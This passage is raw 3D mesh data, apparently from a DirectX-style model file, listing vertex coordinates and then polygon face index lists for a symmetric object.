-0.068729;0.383520;-0.934348;, -0.015584;0.446744;-0.934349;, -0.010434;0.452869;-0.937878;, 0.021708;0.491107;-0.975205;, 0.024363;0.494267;-1.048672;, 0.010929;0.478287;-1.082518;, -0.013484;0.449248;-1.110985;, -0.029708;0.429947;-1.118659;, -0.054615;0.400318;-1.118658;, -0.070839;0.381018;-1.110983;, -0.091302;0.356662;-0.764454;, -0.108660;0.336012;-0.720744;, -0.106146;0.339001;-0.657019;, -0.079765;0.370382;-0.610290;, -0.069410;0.382701;-0.604715;, -0.014886;0.447563;-0.604716;, -0.004529;0.459882;-0.610292;, 0.021847;0.491263;-0.657022;, 0.024360;0.494253;-0.720747;, 0.006999;0.473603;-0.764456;, -0.015270;0.447113;-0.786044;, -0.069037;0.383153;-0.786042;, -0.091307;0.356641;-0.256518;, -0.108644;0.336016;-0.212691;, -0.106043;0.339108;-0.149073;, -0.079709;0.370434;-0.102539;, -0.069863;0.382147;-0.097341;, -0.014404;0.448119;-0.097342;, -0.004560;0.459831;-0.102541;, 0.021770;0.491158;-0.149075;, 0.024369;0.494248;-0.212695;, 0.007030;0.473624;-0.256521;, -0.015254;0.447117;-0.278158;, -0.069026;0.383149;-0.278157;, -0.090353;0.357763;0.193193;, -0.108742;0.335885;0.235897;, -0.108191;0.336540;0.299598;, -0.082212;0.367443;0.349846;, -0.058722;0.395383;0.365433;, -0.042122;0.415132;0.368365;, -0.025521;0.434882;0.365432;, -0.002033;0.462823;0.349844;, 0.023941;0.493724;0.299595;, 0.024491;0.494380;0.235893;, 0.006100;0.472502;0.193190;, -0.016109;0.446085;0.172798;, -0.068146;0.384181;0.172799;, -0.089104;0.454836;-1.118726;, -0.103913;0.421029;-1.118718;, -0.113570;0.399014;-1.111039;, -0.127827;0.366572;-1.083135;, -0.136736;0.351547;-1.034818;, -0.136731;0.351550;-0.975256;, -0.115350;0.395586;-0.937643;, -0.112540;0.402011;-0.934402;, -0.080939;0.474150;-0.934421;, -0.077872;0.481135;-0.937952;, -0.058713;0.524735;-0.975289;, -0.057043;0.528280;-1.048757;, -0.064987;0.510019;-1.082598;, -0.079466;0.476863;-1.111058;, -0.067902;0.505040;-0.764537;, -0.081114;0.474798;-0.786119;, -0.113085;0.401819;-0.786099;, -0.126353;0.371613;-0.764502;, -0.136727;0.351547;-0.720785;, -0.136726;0.351548;-0.657063;, -0.119688;0.387389;-0.610342;, -0.113536;0.401451;-0.604772;, -0.081115;0.475456;-0.604792;, -0.074953;0.489508;-0.610370;, -0.059208;0.525275;-0.657108;, -0.057633;0.528636;-0.720833;, -0.068449;0.505421;-0.256602;, -0.081672;0.475160;-0.278231;, -0.113646;0.402174;-0.278212;, -0.126923;0.371947;-0.256568;, -0.136716;0.351548;-0.212735;, -0.136714;0.351548;-0.149117;, -0.120223;0.387808;-0.102592;, -0.114374;0.401175;-0.097398;, -0.081398;0.476449;-0.097417;, -0.075537;0.489806;-0.102620;, -0.059823;0.525513;-0.149162;, -0.058196;0.528988;-0.212782;, -0.069574;0.504501;0.193108;, -0.082753;0.474344;0.172723;, -0.113696;0.403713;0.172741;, -0.126925;0.373586;0.193142;, -0.136705;0.351548;0.235852;, -0.136703;0.351548;0.299553;, -0.122284;0.384757;0.349793;, -0.108337;0.416649;0.365371;, -0.098469;0.439185;0.368297;, -0.088594;0.461715;0.365361;, -0.074609;0.493583;0.349765;, -0.059099;0.528801;0.299507;, -0.058693;0.529498;0.235805;, -0.129148;0.552446;-1.048787;, -0.130941;0.532431;-1.082628;, -0.134244;0.496071;-1.111088;, -0.136457;0.471909;-1.118758;, -0.139868;0.434818;-1.118749;, -0.142102;0.410660;-1.111069;, -0.145418;0.375051;-1.083167;, -0.149130;0.344921;-1.034850;, -0.149127;0.344925;-0.975287;, -0.142709;0.406797;-0.937676;, -0.142066;0.413847;-0.934434;, -0.134785;0.492992;-0.934450;, -0.134074;0.500657;-0.937982;, -0.129618;0.548514;-0.975320;, -0.133934;0.509545;-0.610391;, -0.130253;0.548814;-0.657129;, -0.129818;0.552537;-0.720852;, -0.132134;0.526674;-0.764558;, -0.135154;0.493506;-0.786139;, -0.142519;0.413440;-0.786121;, -0.145601;0.380286;-0.764524;, -0.149123;0.344906;-0.720810;, -0.149120;0.344907;-0.657086;, -0.144240;0.397508;-0.610366;, -0.142829;0.412931;-0.604795;, -0.135360;0.494126;-0.604812;, -0.134581;0.509579;-0.102637;, -0.130907;0.548779;-0.149180;, -0.130459;0.552630;-0.212800;, -0.132773;0.526799;-0.256620;, -0.135793;0.493610;-0.278250;, -0.143160;0.413534;-0.278232;, -0.146245;0.380358;-0.256588;, -0.149111;0.344887;-0.212756;, -0.149108;0.344888;-0.149138;, -0.144876;0.397671;-0.102612;, -0.143533;0.412334;-0.097417;, -0.135936;0.494919;-0.097436;, -0.134883;0.513422;0.349749;, -0.131254;0.552093;0.299491;, -0.131087;0.552895;0.235790;, -0.133545;0.525494;0.193092;, -0.136560;0.492418;0.172706;, -0.143686;0.414927;0.172724;, -0.146760;0.381862;0.193124;, -0.149099;0.344868;0.235834;, -0.149098;0.344868;0.299535;, -0.145867;0.394027;0.349776;, -0.142672;0.429008;0.365356;, -0.140402;0.453731;0.368280;, -0.138124;0.478452;0.365344;, -0.203979;0.500668;-0.934610;, -0.203268;0.508334;-0.938141;, -0.198812;0.559233;-0.975478;, -0.198341;0.559233;-1.048945;, -0.200134;0.540107;-1.082787;, -0.203438;0.503746;-1.111247;, -0.205649;0.479583;-1.118916;, -0.209062;0.442494;-1.118907;, -0.211296;0.418336;-1.111227;, -0.214612;0.354830;-1.083325;, -0.218324;0.313225;-1.035008;, -0.218320;0.313225;-0.975446;, -0.211904;0.393583;-0.937833;, -0.211258;0.407460;-0.934591;, -0.213450;0.384625;-0.610480;, -0.212040;0.413378;-0.604909;, -0.204570;0.501641;-0.604926;, -0.203142;0.517060;-0.610505;, -0.199463;0.559233;-0.657244;, -0.199028;0.559233;-0.720969;, -0.201343;0.534189;-0.764671;, -0.204362;0.501022;-0.786254;, -0.211730;0.420956;-0.786236;, -0.214810;0.357671;-0.764638;, -0.218332;0.313225;-0.720923;, -0.218329;0.313225;-0.657200;, -0.214101;0.384401;-0.102715;, -0.212761;0.411618;-0.097520;, -0.205164;0.502248;-0.097538;, -0.203807;0.516908;-0.102740;, -0.200134;0.559233;-0.149282;, -0.199687;0.559233;-0.212902;, -0.201999;0.534128;-0.256723;, -0.205021;0.500939;-0.278353;, -0.212388;0.420862;-0.278334;, -0.215470;0.357576;-0.256690;, -0.218338;0.313225;-0.212858;, -0.218337;0.313225;-0.149240;, -0.211917;0.436149;0.365265;, -0.209646;0.460873;0.368191;, -0.207368;0.485593;0.365253;, -0.204128;0.520564;0.349660;, -0.200500;0.559233;0.299400;, -0.200331;0.559233;0.235699;, -0.202789;0.532636;0.193002;, -0.205804;0.499559;0.172617;, -0.212933;0.422067;0.172634;, -0.216004;0.358455;0.193033;, -0.218345;0.313225;0.235743;, -0.218342;0.313225;0.299445;, -0.215112;0.381488;0.349686;, -0.248288;0.313225;-0.720962;, -0.248286;0.313225;-0.657238;, -0.248275;0.313225;-0.212896;, -0.248273;0.313225;-0.149278;, -0.248263;0.313225;0.235706;, -0.248262;0.313225;0.299407;, -0.248260;0.386261;0.349647;, -0.248260;0.439408;0.365226;, -0.248260;0.464130;0.368152;, -0.248260;0.488852;0.365216;, -0.248260;0.523823;0.349621;, -0.248262;0.559233;0.299363;, -0.248263;0.559233;0.235660;, -0.248273;0.559233;-0.149321;, -0.248275;0.559233;-0.212940;, -0.248286;0.559233;-0.657281;, -0.248288;0.559233;-0.721006;, -0.248295;0.559233;-0.975515;, -0.248297;0.559233;-1.048984;, -0.248298;0.543365;-1.082824;, -0.248300;0.507005;-1.111284;, -0.248300;0.482842;-1.118954;, -0.248300;0.445752;-1.118944;, -0.248300;0.421595;-1.111266;, -0.248298;0.358849;-1.083363;, -0.248296;0.313225;-1.035047;, -0.248295;0.313225;-0.975485;, -0.200317;0.591133;0.209366;, -0.200331;0.580501;0.235699;, -0.248263;0.580501;0.235660;, -0.248264;0.591133;0.209327;, -0.248273;0.591133;-0.122987;, -0.248273;0.580501;-0.149321;, -0.200134;0.580501;-0.149282;, -0.200146;0.591133;-0.122949;, -0.199671;0.591133;-0.239237;, -0.199687;0.580501;-0.212902;, -0.248275;0.580501;-0.212940;, -0.248275;0.591133;-0.239274;, -0.248286;0.591133;-0.630947;, -0.248286;0.580501;-0.657281;, -0.199463;0.580501;-0.657244;, -0.199480;0.591133;-0.630909;, -0.199013;0.591133;-0.747301;, -0.199028;0.580501;-0.720969;, -0.248288;0.580501;-0.721006;, -0.248290;0.591133;-0.747339;, -0.248294;0.591133;-0.949183;, -0.248295;0.580501;-0.975515;, -0.198812;0.580501;-0.975478;, -0.198824;0.591133;-0.949145;, -0.329922;0.358849;-1.083360;, -0.329920;0.313225;-1.035045;, -0.329919;0.313225;-0.975483;, -0.329912;0.313225;-0.720960;, -0.329911;0.313225;-0.657236;, -0.329899;0.313225;-0.212894;, -0.329897;0.313225;-0.149276;, -0.329887;0.313225;0.235708;, -0.329886;0.313225;0.299409;, -0.329885;0.386261;0.349650;, -0.329885;0.439408;0.365228;, -0.329885;0.464130;0.368154;, -0.329885;0.488852;0.365218;, -0.329885;0.523823;0.349623;, -0.329886;0.559233;0.299365;, -0.329887;0.559233;0.235663;, -0.329887;0.580501;0.235663;, -0.329887;0.618975;0.209329;, -0.329897;0.618975;-0.122985;, -0.329897;0.580501;-0.149319;, -0.329897;0.559233;-0.149319;, -0.329899;0.559233;-0.212938;, -0.329899;0.580501;-0.212938;, -0.329900;0.618975;-0.239272;, -0.329910;0.618975;-0.630945;, -0.329911;0.580501;-0.657278;, -0.329911;0.559233;-0.657278;, -0.329912;0.559233;-0.721003;, -0.329912;0.580501;-0.721003;, -0.329914;0.618975;-0.747337;, -0.329918;0.618975;-0.949181;, -0.329919;0.608341;-0.975513;, -0.329919;0.559233;-0.975513;, -0.329921;0.559233;-1.048982;, -0.329922;0.543365;-1.082822;, -0.329922;0.507005;-1.111282;, -0.329922;0.482842;-1.118951;, -0.329922;0.445752;-1.118942;, -0.329922;0.421595;-1.111264;, -0.666348;0.421595;-1.111255;, -0.666348;0.445752;-1.118934;, -0.666348;0.482842;-1.118943;, -0.666348;0.507005;-1.111273;, -0.666348;0.543365;-1.082814;, -0.666347;0.559233;-1.048973;, -0.666344;0.559233;-0.975504;, -0.666344;0.608341;-0.975504;, -0.666344;0.618975;-0.949172;, -0.666338;0.618975;-0.747328;, -0.666337;0.580501;-0.720995;, -0.666337;0.559233;-0.720995;, -0.666337;0.559233;-0.657270;, -0.666337;0.580501;-0.657270;, -0.666337;0.618975;-0.630936;, -0.666326;0.618975;-0.239263;, -0.666325;0.580501;-0.212929;, -0.666325;0.559233;-0.212929;, -0.666322;0.559233;-0.149310;, -0.666322;0.580501;-0.149310;, -0.666322;0.618975;-0.122976;, -0.666313;0.618975;0.209338;, -0.666312;0.580501;0.235671;, -0.666312;0.559233;0.235671;, -0.666310;0.559233;0.299374;, -0.666309;0.523823;0.349632;, -0.666309;0.488852;0.365227;, -0.666309;0.464130;0.368163;, -0.666309;0.439408;0.365237;, -0.666309;0.386261;0.349658;, -0.666310;0.313225;0.299418;, -0.666312;0.313225;0.235717;, -0.666322;0.313225;-0.149267;, -0.666325;0.313225;-0.212885;, -0.666337;0.313225;-0.657227;, -0.666337;0.313225;-0.720951;, -0.666344;0.313225;-0.975474;, -0.666347;0.313225;-1.035036;, -0.666348;0.358849;-1.083351;, -0.797437;0.591133;-0.949129;, -0.797452;0.580501;-0.975463;, -0.747968;0.580501;-0.975502;, -0.747967;0.591133;-0.949170;, -0.747962;0.591133;-0.747326;, -0.747962;0.580501;-0.720992;, -0.797224;0.580501;-0.720953;, -0.797238;0.591133;-0.747285;, -0.796766;0.591133;-0.630893;, -0.796784;0.580501;-0.657228;, -0.747961;0.580501;-0.657267;, -0.747960;0.591133;-0.630934;, -0.747950;0.591133;-0.239261;, -0.747948;0.580501;-0.212927;, -0.796537;0.580501;-0.212886;, -0.796554;0.591133;-0.239222;, -0.796072;0.591133;-0.122934;, -0.796086;0.580501;-0.149267;, -0.747946;0.580501;-0.149308;, -0.747946;0.591133;-0.122974;, -0.747937;0.591133;0.209340;, -0.747936;0.580501;0.235674;, -0.795868;0.580501;0.235715;, -0.795883;0.591133;0.209381;, -0.747968;0.313225;-0.975472;, -0.747969;0.313225;-1.035034;, -0.747972;0.358849;-1.083349;, -0.747972;0.421595;-1.111253;, -0.747972;0.445752;-1.118931;, -0.747972;0.482842;-1.118941;, -0.747972;0.507005;-1.111271;, -0.747972;0.543365;-1.082811;, -0.747971;0.559233;-1.048971;, -0.747968;0.559233;-0.975502;, -0.747962;0.559233;-0.720992;, -0.747961;0.559233;-0.657267;, -0.747948;0.559233;-0.212927;, -0.747946;0.559233;-0.149308;, -0.747936;0.559233;0.235674;, -0.747934;0.559233;0.299376;, -0.747933;0.523823;0.349634;, -0.747933;0.488852;0.365229;, -0.747933;0.464130;0.368165;, -0.747933;0.439408;0.365239;, -0.747933;0.386261;0.349661;, -0.747934;0.313225;0.299420;, -0.747936;0.313225;0.235719;, -0.747946;0.313225;-0.149265;, -0.747948;0.313225;-0.212883;, -0.747961;0.313225;-0.657225;, -0.747962;0.313225;-0.720949;, -0.781081;0.381488;0.349701;, -0.777854;0.313225;0.299460;, -0.777854;0.313225;0.235758;, -0.780199;0.358455;0.193048;, -0.783270;0.422067;0.172649;, -0.790400;0.499559;0.172633;, -0.793413;0.532636;0.193017;, -0.795868;0.559233;0.235715;, -0.795698;0.559233;0.299416;, -0.792066;0.520564;0.349675;, -0.788826;0.485593;0.365269;, -0.786546;0.460873;0.368206;, -0.784276;0.436149;0.365280;, -0.777884;0.313225;-0.149226;, -0.777886;0.313225;-0.212843;, -0.780756;0.357576;-0.256675;, -0.783839;0.420862;-0.278319;, -0.791206;0.500939;-0.278337;, -0.794226;0.534128;-0.256707;, -0.796537;0.559233;-0.212886;, -0.796086;0.559233;-0.149267;, -0.792410;0.516908;-0.102724;, -0.791053;0.502248;-0.097523;, -0.783456;0.411618;-0.097505;, -0.782116;0.384401;-0.102700;, -0.777917;0.313225;-0.657185;, -0.777917;0.313225;-0.720908;, -0.781442;0.357671;-0.764623;, -0.784524;0.420956;-0.786221;, -0.791892;0.501022;-0.786238;, -0.794910;0.534189;-0.764656;, -0.797224;0.559233;-0.720953;, -0.796784;0.559233;-0.657228;, -0.793101;0.517060;-0.610490;, -0.791675;0.501641;-0.604911;, -0.784205;0.413378;-0.604894;, -0.782794;0.384625;-0.610465;, -0.785002;0.407460;-0.934575;, -0.784359;0.393583;-0.937818;, -0.777945;0.313225;-0.975431;, -0.777942;0.313225;-1.034993;, -0.781657;0.354830;-1.083310;, -0.784976;0.418336;-1.111212;, -0.787210;0.442494;-1.118892;, -0.790621;0.479583;-1.118900;, -0.792832;0.503746;-1.111231;, -0.796134;0.540107;-1.082771;, -0.797926;0.559233;-1.048930;, -0.797452;0.559233;-0.975463;, -0.792994;0.508334;-0.938126;, -0.792284;0.500668;-0.934594;, -0.858069;0.478452;0.365363;, -0.855792;0.453731;0.368299;, -0.853521;0.429008;0.365375;, -0.850327;0.394027;0.349795;, -0.847098;0.344868;0.299553;, -0.847099;0.344868;0.235852;, -0.849442;0.381862;0.193143;, -0.852515;0.414927;0.172742;, -0.859643;0.492418;0.172725;, -0.862657;0.525494;0.193111;, -0.865112;0.552895;0.235809;, -0.864943;0.552093;0.299510;, -0.861310;0.513422;0.349768;, -0.860282;0.494919;-0.097417;, -0.852684;0.412334;-0.097399;, -0.851342;0.397671;-0.102594;, -0.847112;0.344888;-0.149119;, -0.847112;0.344887;-0.212737;, -0.849982;0.380358;-0.256569;, -0.853066;0.413534;-0.278213;, -0.860434;0.493610;-0.278231;, -0.863453;0.526799;-0.256601;, -0.865765;0.552630;-0.212780;, -0.865314;0.548779;-0.149161;, -0.861638;0.509579;-0.102618;, -0.860883;0.494126;-0.604793;, -0.853414;0.412931;-0.604776;, -0.852005;0.397508;-0.610348;, -0.847126;0.344907;-0.657067;, -0.847127;0.344906;-0.720791;, -0.850651;0.380286;-0.764505;, -0.853735;0.413440;-0.786102;, -0.861099;0.493506;-0.786120;, -0.864119;0.526674;-0.764539;, -0.866432;0.552537;-0.720833;, -0.865993;0.548814;-0.657109;, -0.862310;0.509545;-0.610372;, -0.866645;0.548514;-0.975300;, -0.862187;0.500657;-0.937963;, -0.861476;0.492992;-0.934431;, -0.854198;0.413847;-0.934415;, -0.853553;0.406797;-0.937657;, -0.847138;0.344925;-0.975269;, -0.847136;0.344921;-1.034831;, -0.850852;0.375051;-1.083148;, -0.854168;0.410660;-1.111050;, -0.856402;0.434818;-1.118730;, -0.859814;0.471909;-1.118739;, -0.862025;0.496071;-1.111069;, -0.865327;0.532431;-1.082609;, -0.867119;0.552446;-1.048767;, -0.937507;0.529498;0.235828;, -0.937098;0.528801;0.299530;, -0.921585;0.493583;0.349788;, -0.907599;0.461715;0.365382;, -0.897723;0.439185;0.368318;, -0.887856;0.416649;0.365392;, -0.873910;0.384757;0.349813;, -0.859493;0.351548;0.299572;, -0.859495;0.351548;0.235871;, -0.869277;0.373586;0.193161;, -0.882508;0.403713;0.172761;, -0.913449;0.474344;0.172745;, -0.926627;0.504501;0.193130;, -0.938026;0.528988;-0.212759;, -0.936399;0.525513;-0.149139;, -0.920681;0.489806;-0.102598;, -0.914819;0.476449;-0.097395;, -0.881844;0.401175;-0.097378;, -0.875995;0.387808;-0.102572;, -0.859508;0.351548;-0.149098;, -0.859508;0.351548;-0.212716;, -0.869303;0.371947;-0.256548;, -0.882579;0.402174;-0.278192;, -0.914555;0.475160;-0.278209;, -0.927776;0.505421;-0.256579;, -0.938616;0.528636;-0.720810;, -0.937039;0.525275;-0.657085;, -0.921292;0.489508;-0.610348;, -0.915128;0.475456;-0.604770;, -0.882708;0.401451;-0.604752;, -0.876557;0.387389;-0.610323;, -0.859521;0.351548;-0.657044;, -0.859522;0.351547;-0.720766;, -0.869900;0.371613;-0.764482;, -0.883169;0.401819;-0.786079;, -0.915139;0.474798;-0.786097;, -0.928351;0.505040;-0.764514;, -0.916804;0.476863;-1.111036;, -0.931283;0.510019;-1.082575;, -0.939225;0.528280;-1.048734;, -0.937551;0.524735;-0.975266;, -0.918388;0.481135;-0.937930;, -0.915322;0.474150;-0.934399;, -0.883720;0.402011;-0.934382;, -0.880910;0.395586;-0.937622;, -0.859532;0.351550;-0.975237;, -0.859531;0.351547;-1.034799;, -0.868442;0.366572;-1.083116;, -0.882700;0.399014;-1.111019;, -0.892357;0.421029;-1.118697;, -0.907167;0.454836;-1.118704;, -0.928057;0.384181;0.172822;, -0.980095;0.446085;0.172823;, -1.002302;0.472502;0.193217;, -1.020691;0.494380;0.235921;, -1.020139;0.493724;0.299622;, -0.994161;0.462823;0.349870;, -0.970671;0.434882;0.365456;, -0.954071;0.415132;0.368389;, -0.937469;0.395383;0.365456;, -0.913982;0.367443;0.349868;, -0.888007;0.336540;0.299619;, -0.887456;0.335885;0.235917;, -0.905849;0.357763;0.193214;, -0.927200;0.383149;-0.278134;, -0.980974;0.447117;-0.278133;, -1.003256;0.473624;-0.256494;, -1.020592;0.494248;-0.212667;, -1.017992;0.491158;-0.149048;, -0.991658;0.459831;-0.102515;, -0.981812;0.448119;-0.097317;, -0.926354;0.382147;-0.097318;, -0.916509;0.370434;-0.102517;, -0.890177;0.339108;-0.149052;, -0.887580;0.336016;-0.212671;, -0.904918;0.356641;-0.256497;, -0.927217;0.383153;-0.786020;, -0.980984;0.447113;-0.786018;, -1.003251;0.473603;-0.764430;, -1.020610;0.494253;-0.720720;, -1.018094;0.491263;-0.656995;, -0.991715;0.459882;-0.610266;, -0.981358;0.447563;-0.604691;, -0.926835;0.382701;-0.604692;, -0.916480;0.370382;-0.610268;, -0.890100;0.339001;-0.656998;, -0.887590;0.336012;-0.720723;, -0.904948;0.356662;-0.764432;, -0.925432;0.381018;-1.110961;, -0.941657;0.400318;-1.118634;, -0.966563;0.429947;-1.118634;, -0.982788;0.449248;-1.110959;, -1.007196;0.478287;-1.082491;, -1.020630;0.494267;-1.048644;, -1.017972;0.491107;-0.975177;, -0.985828;0.452869;-0.937852;, -0.980679;0.446744;-0.934324;, -0.927532;0.383520;-0.934325;, -0.922798;0.377890;-0.937568;, -0.896276;0.346338;-0.975190;, -0.887830;0.336286;-1.034756;, -0.901512;0.352564;-1.083067;, -0.888762;0.316499;0.304069;, -0.888139;0.315760;0.232228;, -0.909039;0.340618;0.183706;, -0.935232;0.371778;0.159655;, -0.992562;0.439978;0.159657;, -1.018754;0.471137;0.183709;, -1.039650;0.495997;0.232232;, -1.039027;0.495257;0.304073;, -1.009887;0.460592;0.360439;, -0.983004;0.428612;0.378278;, -0.963892;0.405879;0.381653;, -0.944779;0.383143;0.378277;, -0.917900;0.351164;0.360437;, -0.891082;0.319247;-0.144015;, -0.888153;0.315760;-0.215807;, -0.907893;0.339244;-0.265710;, -0.934249;0.370594;-0.291300;, -0.993569;0.441161;-0.291299;, -1.019923;0.472512;-0.265707;, -1.039662;0.495997;-0.215803;, -1.036728;0.492508;-0.144011;, -1.006945;0.457079;-0.091385;, -0.993244;0.440780;-0.084150;, -0.934565;0.370976;-0.084151;, -0.920863;0.354677;-0.091387;, -0.890999;0.319133;-0.651982;, -0.888165;0.315760;-0.723883;, -0.907933;0.339274;-0.773656;, -0.934270;0.370602;-0.799187;, -0.993575;0.441153;-0.799186;, -1.019910;0.472481;-0.773653;, -1.039675;0.495997;-0.723879;, -1.036837;0.492623;-0.651977;, -1.007027;0.457160;-0.599172;, -0.992819;0.440260;-0.591524;, -0.935016;0.371496;-0.591525;, -0.920807;0.354595;-0.599174;, -0.897738;0.327138;-0.968606;, -0.888174;0.315760;-1.036036;, -0.903796;0.334342;-1.091191;, -0.930837;0.366508;-1.122724;, -0.950027;0.389337;-1.131800;, -0.977835;0.422419;-1.131800;, -0.997025;0.445248;-1.122723;, -1.024065;0.477414;-1.091187;, -1.039684;0.495997;-1.051832;, -1.036673;0.492417;-0.968602;, -1.000515;0.449404;-0.926614;, -0.992548;0.439927;-0.921154;, -0.935304;0.371829;-0.921156;, -0.927337;0.362351;-0.926616;, -0.898993;0.306858;0.304069;, -0.898371;0.306118;0.232228;, -0.919270;0.330978;0.183706;, -0.945462;0.362137;0.159656;, -0.944796;0.361335;-0.084151;, -0.931093;0.345035;-0.091387;, -0.901313;0.309607;-0.144015;, -0.898382;0.306118;-0.215807;, -0.918125;0.329603;-0.265709;, -0.944479;0.360954;-0.291300;, -0.945245;0.361857;-0.591525;, -0.931038;0.344954;-0.599174;, -0.901230;0.309493;-0.651982;, -0.898396;0.306118;-0.723883;, -0.918164;0.329633;-0.773655;, -0.944500;0.360963;-0.799187;, -0.945534;0.362188;-0.921156;, -0.937567;0.352710;-0.926616;, -0.907969;0.317498;-0.968605;, -0.898405;0.306118;-1.036036;, -0.914027;0.324701;-1.091191;, -0.941067;0.356867;-1.122724;, -0.960258;0.379696;-1.131800;, -0.988066;0.412779;-1.131799;, -1.007255;0.435607;-1.122722;, -1.034295;0.467774;-1.091186;, -1.049914;0.486357;-1.051832;, -1.046903;0.482777;-0.968602;, -1.010745;0.439765;-0.926614;, -1.002778;0.430287;-0.921154;, -1.003806;0.431513;-0.799186;, -1.030139;0.462841;-0.773652;, -1.049905;0.486357;-0.723879;, -1.047067;0.482982;-0.651977;, -1.017257;0.447520;-0.599172;, -1.003049;0.430619;-0.591523;, -1.003799;0.431521;-0.291298;, -1.030152;0.462873;-0.265706;, -1.049892;0.486357;-0.215803;, -1.046958;0.482868;-0.144011;, -1.017175;0.447438;-0.091384;, -1.003473;0.431141;-0.084149;, -1.002793;0.430337;0.159657;, -1.028986;0.461497;0.183709;, -1.049880;0.486357;0.232232;, -1.049257;0.485616;0.304073;, -1.020116;0.450951;0.360439;, -0.993232;0.418973;0.378279;, -0.974121;0.396238;0.381653;, -0.955011;0.373503;0.378278;, -0.928129;0.341524;0.360437;, -0.952708;0.338443;-0.926616;, -0.913544;0.291851;-1.036035;, -0.956207;0.342600;-1.122724;, -1.022396;0.421339;-1.122722;, -1.065055;0.472088;-1.051831;, -1.025887;0.425497;-0.926614;, -0.946179;0.330687;-0.599174;, -0.913538;0.291851;-0.723882;, -0.959641;0.346695;-0.799187;, -1.018947;0.417245;-0.799185;, -1.065046;0.472088;-0.723878;, -1.032397;0.433252;-0.599171;, -0.946234;0.330768;-0.091386;, -0.913523;0.291851;-0.215807;, -0.959621;0.346685;-0.291300;, -1.018940;0.417253;-0.291298;, -1.065033;0.472088;-0.215803;, -1.032315;0.433172;-0.091384;, -0.943270;0.327257;0.360437;, -0.913511;0.291851;0.232229;, -0.960603;0.347869;0.159656;, -1.017933;0.416071;0.159658;, -1.065021;0.472088;0.232233;, -1.035257;0.436684;0.360440;, -0.989264;0.381970;0.381654;, -0.916371;0.295226;-0.651982;, -0.933305;0.315365;-0.773655;, -0.923109;0.303229;-0.968605;, -0.929167;0.310433;-1.091190;, -1.049436;0.453506;-1.091186;, -1.062044;0.468509;-0.968601;, -1.045282;0.448574;-0.773652;, -1.062208;0.468715;-0.651977;, -1.045293;0.448605;-0.265706;, -1.062099;0.468600;-0.144011;, -0.916453;0.295340;-0.144015;, -0.933266;0.315335;-0.265709;, -0.914133;0.292591;0.304069;, -0.934410;0.316710;0.183707;, -1.044126;0.447229;0.183709;, -1.064398;0.471348;0.304073;, -1.018614;0.416873;-0.084149;, -1.018190;0.416351;-0.591523;, -1.017919;0.416020;-0.921154;, -0.960675;0.347921;-0.921155;, -0.960387;0.347588;-0.591524;, -0.959935;0.347067;-0.084151;, -0.975398;0.365429;-1.131800;, -1.003207;0.398512;-1.131799;, -1.008375;0.404705;0.378279;, -0.970152;0.359235;0.378278;; 911; 14;7,6,50,23,49,22,48,3,2,47,21,46,20,45;, 4;41,42,6,7;, 12;8,5,44,25,43,24,42,41,19,40,18,39;, 4;35,36,5,8;, 12;9,4,38,15,37,14,36,35,17,34,16,33;, 4;29,30,4,9;, 13;1,26,0,32,13,31,12,30,29,11,28,10,27;, 4;109,77,78,110;, 4;77,47,2,78;, 4;78,2,3,79;, 4;110,78,79,111;, 4;111,79,80,112;, 4;79,3,48,80;, 4;80,48,22,81;, 4;112,80,81,113;, 4;113,81,82,114;, 4;81,22,49,82;, 4;82,49,23,83;, 4;114,82,83,115;, 4;115,83,84,102;, 4;83,23,50,84;, 4;84,50,6,85;, 4;102,84,85,103;, 4;103,85,72,104;, 4;104,72,73,105;, 4;72,7,45,73;, 4;73,45,20,74;, 4;105,73,74,106;, 4;106,74,75,107;, 4;74,20,46,75;, 4;75,46,21,76;, 4;107,75,76,108;, 4;108,76,77,109;, 4;76,21,47,77;, 4;163,109,110,164;, 4;164,110,111,165;, 4;165,111,112,166;, 4;166,112,113,153;, 4;206,166,153,207;, 4;260,206,207,261;, 4;314,260,261,315;, 4;380,314,315,381;, 4;446,380,381,408;, 4;447,446,408,485;, 4;485,512,513,447;, 4;512,578,579,513;, 4;578,632,633,579;, 4;632,686,687,633;, 4;686,740,727,687;, 4;687,727,728,688;, 4;688,728,729,689;, 4;689,729,730,676;, 4;635,689,676,636;, 4;634,688,689,635;, 4;633,687,688,634;, 4;579,633,634,580;, 4;580,634,635,581;, 4;581,635,636,582;, 4;515,581,582,516;, 4;514,580,581,515;, 4;448,514,515,449;, 4;449,515,516,450;, 4;450,443,444,449;, 4;449,444,445,448;, 4;444,378,379,445;, 4;443,377,378,444;, 4;377,311,312,378;, 4;378,312,313,379;, 4;379,313,314,380;, 4;445,379,380,446;, 4;448,445,446,447;, 4;447,513,514,448;, 4;513,579,580,514;, 4;450,516,517,451;, 4;516,582,583,517;, 4;582,636,637,583;, 4;636,676,677,637;, 4;676,730,731,677;, 4;730,784,785,731;, 4;729,783,784,730;, 4;728,782,783,729;, 4;727,781,782,728;, 4;740,780,781,727;, 4;739,779,780,740;, 4;685,739,740,686;, 3;632,685,686;, 3;685,632,631;, 4;577,631,632,578;, 4;511,577,578,512;, 4;484,511,512,485;, 4;485,408,409,484;, 4;408,381,382,409;, 4;381,315,316,382;, 4;315,261,262,316;, 3;261,208,262;, 3;261,207,208;, 4;207,153,154,208;, 4;153,113,114,154;, 4;154,114,115,155;, 3;209,154,155;, 3;154,209,208;, 4;262,208,209,263;, 4;316,262,263,317;, 4;382,316,317,383;, 4;409,382,383,410;, 4;484,409,410,483;, 4;483,510,511,484;, 4;510,576,577,511;, 4;576,630,631,577;, 4;630,684,685,631;, 3;684,739,685;, 3;684,738,739;, 4;738,778,779,739;, 4;737,791,778,738;, 4;736,790,791,737;, 4;735,789,790,736;, 4;681,735,736,682;, 4;627,681,682,628;, 4;626,680,681,627;, 4;680,734,735,681;, 4;734,788,789,735;, 4;733,787,788,734;, 4;679,733,734,680;, 4;625,679,680,626;, 4;585,625,626,586;, 4;586,626,627,587;, 4;638,678,679,625;, 4;678,732,733,679;, 4;732,786,787,733;, 4;731,785,786,732;, 4;677,731,732,678;, 4;637,677,678,638;, 4;583,637,638,584;, 4;517,583,584,518;, 4;451,517,518,452;, 4;452,441,442,451;, 4;441,375,376,442;, 4;375,309,310,376;, 4;309,255,256,310;, 4;255,215,216,256;, 4;215,161,162,216;, 4;161,107,108,162;, 4;162,108,109,163;, 4;216,162,163,217;, 4;256,216,217,257;, 4;310,256,257,311;, 4;376,310,311,377;, 4;442,376,377,443;, 4;451,442,443,450;, 4;440,374,375,441;, 4;374,308,309,375;, 4;308,268,255,309;, 4;268,214,215,255;, 4;214,160,161,215;, 4;160,106,107,161;, 